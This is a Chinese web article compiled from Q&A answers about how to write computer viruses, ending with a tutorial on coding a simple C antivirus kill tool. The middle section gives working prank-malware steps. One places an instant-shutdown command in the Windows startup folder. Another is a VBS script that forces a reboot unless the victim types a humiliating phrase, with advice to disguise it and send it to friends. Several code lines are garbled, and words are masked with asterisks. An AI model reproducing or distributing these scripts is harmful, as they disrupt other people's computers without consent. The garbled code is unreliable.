今天给各位分享如何设计计算机病毒软件的知识，其中也会对计算机病毒视频教程进行解释，如果能碰巧解决你现在面临的问题，别忘了关注本站，现在开始吧！

本文目录一览：

• 1、电脑病毒是怎么编写的
• 2、怎么做电脑病毒
• 3、如何设计一个杀毒软件！

电脑病毒是怎么编写的

电脑病毒是我们大家都不陌生的，你们也肯定很好奇电脑病毒是什么编写的，下面是我为大家整理的相关的内容，希望对大家有帮助! 如何 *** 电脑病毒 *** 一：

计算机病毒是编写或者在计算机程序中插入的破坏计算机功能或者毁坏数据，影响计算机使用，并能自我复制的一组计算机指令或者程序代码。

*** /步骤

1.计算机病毒的特征是传播性，非授权性，隐藏性，潜伏性，破坏性，不可预见性，可触发性。计算机病毒根据感染方式可以分为感染可执行文件的病毒，感染引导区的病毒，感染文档文件的病毒。

2.计算机病毒根据感染方式可以分为感染可执行文件的病毒，感染引导区的病毒，感染文档文件的病毒。

3.现阶段的反病毒技术有特征码扫描，启发式扫描，虚拟机技术，主动防御技术，自免疫技术，云杀毒等等。

4.一个简单病毒的模块包含，触发模块，传播模块，表现模块。

5.学习计算机病毒，要了解硬盘结构，计算机扇区结构，计算机系统启动过程，文件系统，计算机引导过程。

6.汇编语言和C语言用的会比较多。

注意事项

一个是要理解计算机系统，文件格式。

一个是要精通编程，汇编和C。

计算机病毒的编写 *** 二：

1.打开电脑左下角开始----所有程序----启动，右键点击启动选择属性单击左键。

2.查找下文件位置，找到启动所在文件夹。就可以进行下一步了。

3.打开启动这个文件，复制下文件路径。win7的启动文件家保存的是这个路径，XP的不是这个可以自己实验下。保存下备用

4新建一个记事本，写上如下代码保存。其中shutdown -s -t 0表示0秒后关机，代码的意思是把这个代码写到启动这个文件夹下面。

5.图中标记的代码就是刚才复制的路径，原理跟以前写过的自动关机代码差不多，只是自动关机时间调为0了。

电脑病毒的特点：

计算机病毒不但本身具有破坏性，更有害的是具有传染性，一旦病毒被复制或产生变种，其速度之快令人难以预防。

传染性是病毒的基本特征。

在生物界，病毒通过传染从一个生物体扩散到另一个生物体。在适当的条件下，它可得到大量繁殖，并使被感染的生物体表现出病症甚至死亡。同样，计算机病毒也会通过各种渠道从已被感染的计算机扩散到未被感染的计算机，在某些情况下造成被感染的计算机工作失常甚至瘫痪。与生物病毒不同的是，计算机病毒是一段人为编制的计算机程序代码，这段程序代码一旦进入计算机并得以执行，它就会搜寻其他符合其传染条件的程序或存储介质，确定目标后再将自身代码插入其中，达到自我繁殖的目的。

只要一台计算机染毒，如不及时处理，那么病毒会在这台电脑上迅速扩散，计算机病毒可通过各种可能的渠道，如软盘、计算机 *** 去传染其他的计算机。当您在一台机器上发现了病毒时，往往曾在这台计算机上用过的软盘已感染上了病毒，而与这台机器相联网的其他计算机也许也被该病毒染上了。是否具有传染性是判别一个程序是否为计算机病毒的最重要条件。

潜伏性

有些病毒像定时炸弹一样，让它什么时间发作是预先设计好的。比如黑色星期五病毒，不到预定时间一点都觉察不出来，等到条件具备的时候一下子就爆炸开来，对系统进行破坏。一个编制精巧的计算机病毒程序，进入系统之后一般不会马上发作，因此病毒可以静静地躲在磁盘或磁带里呆上几天，甚至几年，一旦时机成熟，得到运行机会，就又要四处繁殖、扩散，继续为害。潜伏性的第二种表现是指，计算机病毒的内部往往有一种触发机制，不满足触发条件时，计算机病毒除了传染外不做什么破坏。触发条件一旦得到满足，有的在屏幕上显示信息、图形或特殊标识，有的则执行破坏系统的操作，如格式化磁盘、删除磁盘文件、对数据文件做加密、封锁键盘以及使系统死锁等。

隐蔽性

计算机病毒具有很强的隐蔽性，有的可以通过病毒软件检查出来，有的根本就查不出来，有的时隐时现、变化无常，这类病毒处理起来通常很困难。

破坏性

计算机中毒后，可能会导致正常的程序无法运行，把计算机内的文件删除或受到不同程度的损坏 。通常表现为：增、删、改、移。

可触发性

病毒因某个事件或数值的出现，诱使病毒实施感染或进行攻击的特性称为可触发性。为了隐蔽自己，病毒必须潜伏，少做动作。如果完全不动，一直潜伏的话，病毒既不能感染也不能进行破坏，便失去了杀伤力。病毒既要隐蔽又要维持杀伤力，它必须具有可触发性。病毒的触发机制就是用来控制感染和破坏动作的频率的。病毒具有预定的触发条件，这些条件可能是时间、日期、文件类型或某些特定数据等。病毒运行时，触发机制检查预定条件是否满足，如果满足，启动感染或破坏动作，使病毒进行感染或攻击;如果不满足，使病毒继续潜伏。

怎么做电脑病毒

问题一：怎么 *** 电脑病毒 *** 如下：在开始内点击运行输入at xx:xx shutdown -s,xx：xx代表几点几分是在几点几分关机输入shutdown.exe -s -t xx,xx代表多少秒钟后关机 如果要取消，就输入shutdown -a就可以取消了.

我听一个朋友说，有个人给他发个东西。他看了下。。说要输入一句话。。不然就管你机。是怎么编的。。。我知道关机命令和取消命令。。。不知道要对方怎么输才可以取消命令。。

脚本，例如下面的东西。就可以实现。

1。

首先呢,我们在桌面创建个新文件夹然后打开,在上面找到-工具T-文件夹选项O-查看

把隐藏已知文件类型的扩展名前面的勾去掉.

然后我们开始 *** .在桌面建立个记事本,然后把下面代码复制进去

on error resume next

dim WSHshellA

set WSHshellA = wscript.createobject(wscript.shell)

WSHshellA.run cmd.exe /c shutdown -r -t 60 -c 说我是猪，不说我是猪就一分钟关你机，不信，你试试・・・ ,0 ,true

dim a

do while(a 我是猪)

a = inputbox (说我是猪,就不关机，快撒，说 我是猪　,说不说,不说,8000,7000)

msgbox chr(13) + chr(13) + chr(13) + a,0,MsgBox

loop

msgbox chr(13) + chr(13) + chr(13) + 早说就行了嘛,呵呵，猪

dim WSHshell

set WSHshell = wscript.createobject(wscript.shell)

WSHshell.run cmd.exe /c shutdown -a,0 ,true

msgbox chr(13) + chr(13) + chr(13) + 哈哈哈哈，真过瘾

复制之后呢,把后缀修改为.vbs或者改变打开方式为应用程序，这样你再压缩下用 *** 发给你朋友，对方打

开了就在60秒内要关闭计算机，

结素任务都不行，他只能说他是猪才能解决问题。够坏吧？ 注意哦，你可以把我是猪那个修改成任

意想说的话，要是对付你喜欢的人，

就修改成 我爱你 这样他只有说我爱你之后才不关闭计算机哦 也可以把时间修改为20 就是说打

开了20秒就关了,还没等对方打完就关机了 是不是叫对方很郁闷呢?

第2招编写VBS脚本

首先你可以看下面的

WScript.Echo(嘿，谢谢你打开我哦，我等你很久拉！TSName)

WScript.Echo(你是可爱的小朋吗?)

WScript.Echo(哈,我想你拉，这你都不知道吗？)

WScript.Echo(怎么才来，说~是不是不关心我)

WScript.Echo(哼,我生气拉，等你这么久，心都凉啦。)

WScript.Echo(小强很生气，......

问题二：如何 *** 电脑病毒 说来简单，去学编程，掌握基础知识就可以 *** 出一些没有什么实际意义的小病毒程序了。

等编程研究到一定高度了，就可以做破坏力大散播速范围广的病毒了。

但是，编程真的很难学。。。

问题三：怎么做电脑病毒。 *** 电脑病毒是要会编程语言的。写病毒一般用C或delphi等。。C比较于delphi等高级语音来说比较难学，开发周期长！不过C也有他的特点。C可以直接对硬件进行操作，C比delphi等高级语言的执行效率高10-1000倍不等。C的代表病毒：熊猫烧香（李俊）delphi相比C就好学多了，不过delphi不能直接对研究进行操作，相对于C语言delphi编写出的程序执行效率要低点。delphi特点;上手快，学习起来轻松，程序开发周期短。一般的黑客软件基本都是delphi编写的。 delphi被黑客公认为黑客的编程语言delphi的代表：灰鸽子（葛军大哥）

问题四：怎么 *** 电脑病毒。 制造病毒也会感染自己电脑，你可以装pe系统，在里面自己研究，你可以去华盟网看看

问题五：怎么 *** 电脑病毒？ 有编程工具编写，c++、c#、c、java语言都可以编写病毒，关键需要编程基础。

问题六：如何 *** 简单的电脑病毒？ 你好!

任何制造，传播，使用病毒程序破坏他人计算机安全的行为都是违法的。

请不要尝试！

问题七：怎么 *** 电脑病毒？ 你懂编程么？！ 你会C VC++ JAVA VB 等一些编汇语言么 不会的话空喊个什么啊 别老想着搞人家电脑 先看你自己电脑被搞了没有

问题八：我们应该怎么防止电脑病毒？ 【平时就应该保护好我们的电脑，给一些建议】

1、安装杀毒软件还是必要的，要及时更新病毒库，还要装防火墙（防木马、黑客攻击等），定期杀毒，维护好电脑运行安全；

推荐楼主可以安装腾讯电脑管家，它是免费专业安全软件，杀毒管理二合一(只需要下载一份），占内存小，杀毒好，防护好，无误报误杀。拥有云查杀引擎、反病毒引擎、金山云查杀引擎、AVIRA查杀引擎、小红伞和查杀修复引擎等世界一流杀毒软件内嵌杀毒引擎！

其中软件升级、漏洞修复、垃圾清理，都有自动和定期设置，懒人必备

2、修复漏洞和补丁；打开腾讯电脑管家――工具箱――漏洞修复

3、平时不要上一些不明网站，不要随便下载东西；

4、还要提防随身移动存储设备(如U盘等，最近U盘病毒挺猖獗的）；

5、不进不明不网站，不收奇怪邮件。下载完压缩包文件后先进行病毒扫描

6、关闭不必要的端口

7、要是有时间和精力的话，学一些电脑的常用技巧和知识；

最后，我要说的是，你要是平常的确是很小心，但还是中毒的话，那也是没办法的！（用Ghost备份系统是个不错的选择）

问题九：怎么 *** 一个病毒 可以攻击别人电脑的 攻击分很多种，不知道场想达到什么目的！让对方上不了网？洪水DDOS？控制对方电脑？盗取对方个人信息？但我要告诉你，都是犯法的，现在国家对信息安全管理的很严格！其实你现在干嘛WJ都知道，就是不愿意管！有的人下个A都能被罚！

问题十：如何 *** 电脑病毒 病毒其实是软件，但和其他软件不同的是，它是一个有害的软件,而比如360这些软件是好的软件

你可以用VC、VB、VS、delphi、JAVA等编程软件

推荐VC， *** 、360以及windows系列操作系统的部分，是用VC编写的。

但我要提醒你，要做成他们那样可不容易，因为编程是抽象的，你虽然有了编程软件，但你不是随便点几下按钮就能生成一个软件（木马）的，要精通这门语言

如何设计一个杀毒软件！

信息来源：neeao blog

如今病毒木马蠕虫层出不穷,变种也是一个接一个。反病毒公司以及各大安全公司随着影响很大的病毒的出现都会免费提供病毒专杀工具，这个举措对普通用户来说确实很有帮助。其实写病毒专杀工具也不像大家想象的那么神秘，利用SDK写个控制台程序来实现病毒专杀，因无须写图形界面，所以简便快捷！你自己也能写！不信？就接着看吧 废话不说了，接下来就开始谈谈病毒专杀工具的思路及实现 *** 。

此文中讲解的病毒专杀工具是针对木马、蠕虫等独立的程序而言的广义的病毒而言，而不是指那种自我复制感染PE文件的依附于其他程序的那种狭义的病毒。因为写那种病毒的专杀工具需要PE文件结构等知识，相对而言有点难度，所以我们就先从相对简单点的开始，难的以后再介绍。

对于大多数病毒而言，杀毒的思路其实很简单，那就是：终止病毒的进程、删除自启动项目（一般在注册表中的run*主键下）、删除病毒文件，对设置了文件关联的病毒而言还要修改注册表恢复文件关联。下面将分别陈述。

一.终止进程

以前网上曾有许多朋友问我怎么根据文件名终止指定进程,为什么使用函数TerminateProcess()不能直接终止指定进程。首先让我们来看看函数TerminateProcess()的声明吧：Bool TerminateProcess(HANDLE hPeocess,UINT uExitCode)，其中之一个参数为进程句柄，而不是进程名称（文件名）。那怎样才能获得指定进程的句柄呢？我们可以使用函数OpenProcess()，其原型为

HANDLE OpenProcess(

DWORD dwDesiredAccess, // 访问标志

BOOL bInheritHandle, // 处理继承的标志

DWORD dwProcessId // 进程标识号,即进程ID

);

最后一个参数就是该进程的ID，进程句柄和进程ID是两回事，这时你可能很郁闷：怎么知道进程ID呢？ *** 当然有啦！在Windows9X/2000/XP/2003中，微软均提供了用来枚举进程的ToolHelp API系列函数。先运用函数CreateToolhelp32Snapshot()取得快照句柄，然后使用Process32First()以及Process32Next()枚举当前的进程。枚举过程中会将每一个进程的信息存放到PROCESSENTRY32结构中。PROCESSENTRY32的原型为：

typedef struct tagPROCESSENTRY32

{

DWORD dwSize; // 结构大小；

DWORD cntUsage; // 此进程的引用计数；

DWORD th32ProcessID; // 进程ID;

DWORD th32DefaultHeapID; // 进程默认堆ID；

DWORD th32ModuleID; // 进程模块ID；

DWORD cntThreads; // 此进程开启的线程计数；

DWORD th32ParentProcessID; // 父进程ID；

LONG pcPriClassBase; // 线程优先权；

DWORD dwFlags; // 保留；

char szExeFile[MAX_PATH]; // 进程全名；

} PROCESSENTRY32;

其中th32ProcessID就是进程的ID，szExeFile为该进程的文件名。所以要终止指定进程，我们可以枚举进程，逐一判断szExeFile是否和我们欲终止的进程名相同，如果相同就取其th32ProcessID参数，然后代入OpenProcess函数，取得目标进程的句柄。这样就可以利用函数TerminateProcess()终止该进程了。我写了个终止指定进程的函数，如下：

void KillProcessFromName(LPCTSTR name)//name为你要终止的进程的名称，Win9X则需包括路径

{

PROCESSENTRY32 pe;//定义一个PROCESSENTRY32结类型的变量

HANDLE hShot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);// 创建快照句柄

pe.dwSize=sizeof(PROCESSENTRY32);//一定要先为dwSize赋值

if (Process32First(hShot,pe))

{

do

{if (strcmp(pe.szExeFile,name)==0) //判断此进程是否为你要终止的进程

HANDLE hProcess=OpenProcess(PROCESS_ALL_ACCESS,FALSE,pe.th32ProcessID);//如果是就利用其ID获得句柄

TerminateProcess(hProcess,0);//终止该进程

}

while(Process32Next(hkz,pe));

}

CloseHandle(hShot);//最后别忘记Close

}

在使用时只要在main()主函数里调用函数KillProcessFromName（），把参数设为你要终止的进程的名称即可，Win9X则需包括路径。还有一点值得注意一下，就是别忘了#include TlHelp32.h。

二、删除文件

这一步骤很简单，调用函数DeleteFile()即可，Bool DeleteFile(LPCTSTR lpFilename)，把lpFilename设要指向删除的文件的文件名的指针即可，可包含具体路径。

三、修改注册表，删除启动项及文件关联

首先用函数RegOpenKeyEx()打开目标主键，RegOpenKeyEx()函数原型为

LONG RegOpenKeyEx(

HKEY hKey,// 将要打开的键的句柄

LPCTSTR lpSubKey,// 指向将要打开的包含子建的名称字符串指针

DWORD ulOptions,// 为保留字，必须为NULL

REGSAM samDesired,// 访问权限

PHKEY phkResult//指向打开键的句柄指针

);

获得句柄后用函数RegSetValueEx()进行修改键值，函数原型为：

LONG RegSetValueEx(

HKEY hKey, //当前打开的键的句柄

LPCTSTR lpValueName, //指向非空的包含要查询的值名称的字符串指针

DWORD Reserved, //保留值，必须为NULL

DWORD dwType,//键值类型，比如REG_SZ、REG_DWORD等

CONST BYTE * lpData , //指向键值数据的指针，注意此变量类型，不是LPCTSTR！

DWORD cbData//指向保存设定值长度变量的指针，以字节为单位

);

当然也可以用函数RegDeleteValue()来删除键值。操作完毕后别忘了用函数RegCloseKey()来Close。

使用这些函数很简单，只要把相应的参数换为你要删除或修改注册表的相应数值，唯一值得注意的是RegSetValueEx()函数中第5个参数的类型是BYTE而不是LPCTSTR！通过这些就可以很方便删除指定启动项以及恢复文件关联，为了便于大家理解，我举个修复EXE文件关联的例子，大家修改相应的参数就可以适用其它键值的修改，换用RegDeleteValue函数就可以实现删除自启动项。

HKEY hKey;

LPCTSTR data1="\"%1\" %*";//EXE文件默认的open方式，”%1\"表EXE文件本身

DWORD lResult=RegOpenKeyEx(HKEY_CLASSES_ROOT,"exefile\\shell\\open\\command",0,KEY_WRITE,hKey);

if(lResult==ERROR_SUCCESS)

RegSetValueEx(hKey,"",NULL,REG_SZ,(LPBYTE)data1,9);//修改键值

RegCloseKey(hKey);

到这里，一个病毒专杀工具的模型就已初步完成了，大家自己编写时只需把文中函数的形参换为你要杀的目标病毒的相应特征数据编译即可。这个是个简单的专杀工具，只能对付普通的木马、蠕虫等病毒，大家应具体情况具体分析，根据具体情况扩充该程序功能，比如有些木马是通过修改win.ini、system.ini来实现自动运行,我们就需操作文件删除相应数据，除此之外，有时还需添加终止服务、卸载DLL模块、进入RING0操作等功能。总之，我相信大家一定能自己写出病毒木马专杀工具的！呵呵，是不是很有成就感呢！

关于如何设计计算机病毒软件和计算机病毒视频教程的介绍到此就结束了，不知道你从中找到你需要的信息了吗 ？如果你还想了解更多这方面的信息，记得收藏关注本站。